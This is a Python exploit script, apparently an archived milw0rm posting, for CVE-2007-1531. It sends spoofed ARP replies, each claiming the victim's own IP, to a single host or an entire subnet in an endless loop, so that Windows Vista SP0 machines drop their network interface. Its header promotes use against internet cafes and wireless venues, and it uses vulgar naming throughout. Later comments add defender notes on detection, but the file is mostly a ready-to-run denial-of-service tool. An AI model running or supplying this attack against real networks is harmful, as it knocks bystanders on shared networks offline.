#!/usr/bin/env python
#
# :: Kristian Hermansen ::
# Date: 20070514
# Reference: CVE-2007-1531
# Description: Mcft Windows Vista (SP0) dumps interfaces when
# it receives this ARP packet.  This DoS is useful for an internet
# cafe, wireless venue, or legitimate local attack.  The victim will
# need to manually refresh their network interface.  OK, sure
# it's a dumb local attack, but why does Vista disable iface!?!??
# -> Thanks to Newsham / Hoagland
# Vulnerable: Mcft Windows Vista (SP0) [All Versions]
# Tested:
# * victim == Windows Vista Enterprise (SP0) [English]
# * attacker == Ubuntu Feisty (7.04)
# Usage: python fISTArp.py <target-ip-or-cidr>
# Depends: scapy.py
# [?] If you don't have scapy
# [+] wget //hg.secdev.org/scapy/raw-file/tip/scapy.py

from sys import argv
from os import geteuid
from scapy import Ether,ARP,send,srp,conf
from time import sleep

# Turn off scapy's own console output; the script prints its own status lines.
conf.verb = 0

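def head():
   """Print the tool's ASCII-art banner to stdout.

   The banner is a raw string so that each backslash in the art is printed
   literally.  In a normal triple-quoted string a backslash that ends a
   row is a line continuation, which fuses that row with the next one.
   """
   # A single parenthesised argument prints identically on Python 2 and 3.
   print(r"""
                      __ ___ ____ _____  _                
                     / _|_ _/ ___|_   _|/ \   _ __ _ __  
                    | |_ | |\___ \ | | / _ \ | '__| '_ \
                    |  _|| | ___) || |/ ___ \| |  | |_) |
                    |_| |___|____/ |_/_/   \_\_|  | .__/
                                                  |_|    

   """)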

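def isroot():
   """Report whether the process is running with an effective UID of 0.

   Returns:
      True when geteuid() is 0.  Otherwise prints a hint to re-run as
      root and returns False.
   """
   is_root = geteuid() == 0
   if not is_root:
      # A single parenthesised argument prints identically on Python 2 and 3.
      print("TRY AGAIN AS ROOT SILLY...")
   return is_root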

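def usage():
   """Print the command synopsis followed by two example invocations.

   The script takes exactly one argument: the target, given either as a
   single IPv4 address or as a CIDR range, as the two examples show.
   """
   prog = argv[0]
   # Name the one required argument in the synopsis; the examples below
   # show the two accepted forms.
   print("usage: %s <target-ip-or-cidr>" % prog)
   print("examples: %s 192.168.1.100" % prog)
   print("examples: %s 192.168.1.0/24\n" % prog)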

def fisting():
   """Probe the target(s) in a loop and send each live one a spoofed ARP reply.

   argv[1] is the target: one address or a CIDR range (see usage()).  For
   every address the loop (1) checks liveness with a broadcast ARP request,
   (2) sends an ARP reply whose sender IP is the target's own IP, and
   (3) probes again to see whether the host has stopped answering.  The
   outer loop never returns; it runs until the process is interrupted.

   Defender notes: on the wire the trigger is an ARP reply (op=2) whose
   sender and target protocol addresses are both the victim's IP.  The
   code leaves the hardware source address at scapy's default, presumably
   the sending interface's MAC, so the claim comes from a MAC that is not
   the victim's.  ARP monitoring that flags an IP being claimed by a new
   MAC, and switch-side ARP validation against known IP-to-MAC bindings,
   cover this pattern.  Check the vendor advisory for the CVE named in
   the file header for fixed builds.
   """
   # op=2 is an ARP reply ("is-at"); pdst may name one host or a network.
   arp_fist = ARP(pdst=argv[1],op=2)
   print "We are going to loop forever, CTRL-C to stop...\n"
   while True:
       sleep(3)
       # Iterating a scapy packet whose pdst is a network yields one packet
       # per address in that network.
       for a in arp_fist:
           # Liveness probe: a broadcast ARP request (ARP's default op) for
           # this address.
           arping = Ether(dst="ff:ff:ff:ff:ff:ff")/ARP(pdst=a.pdst)
           # srp() returns (answered, unanswered); wait at most 0.1 s.
           ans,unans = srp(arping,timeout=0.1)
           if len(ans) == 1:
               # Make the reply's sender IP equal to the target's own IP, so
               # the packet claims the target's address.
               a.psrc=a.pdst
               print a.pdst, "is ALIVE!"
               print "* Time to shut it down!"
               # send() transmits the bare ARP packet and lets scapy supply
               # the link-layer header.
               send(a)
               # Re-probe: an unanswered request is taken as proof that the
               # interface went down.
               # NOTE(review): with a 0.1 s timeout a late reply is counted
               # the same way, so this check can report false positives.
               ans2,unans2 = srp(arping,timeout=0.1)
               if len(unans2) == 1:
                   print "@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@"
                   print "@@@", a.psrc, "was rubber fisted!"
                   print "@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@"
                   sleep(3)
               else:
                   print "FAILED:", a.pdst, "is still alive :-("
           else:
               # The first probe got no answer, so nothing is sent to this
               # address.
               print a.pdst, "is already DEAD!"
           print

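# Script entry: banner, privilege check, argument check, then the main loop.
head()
if not isroot():
   # isroot() has already printed the hint; exit with a non-zero status.
   # SystemExit is raised directly so the script does not depend on the
   # site-provided exit() helper.
   raise SystemExit(1)
if len(argv) != 2:
   # Exactly one argument (the target) is required.
   usage()
   raise SystemExit(1)
fisting()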

# u.b.u.n.t.u n.e.t.s.n.i.p.e.r t.h.c.t.e.st.

# milw0rm.com [2007-05-15]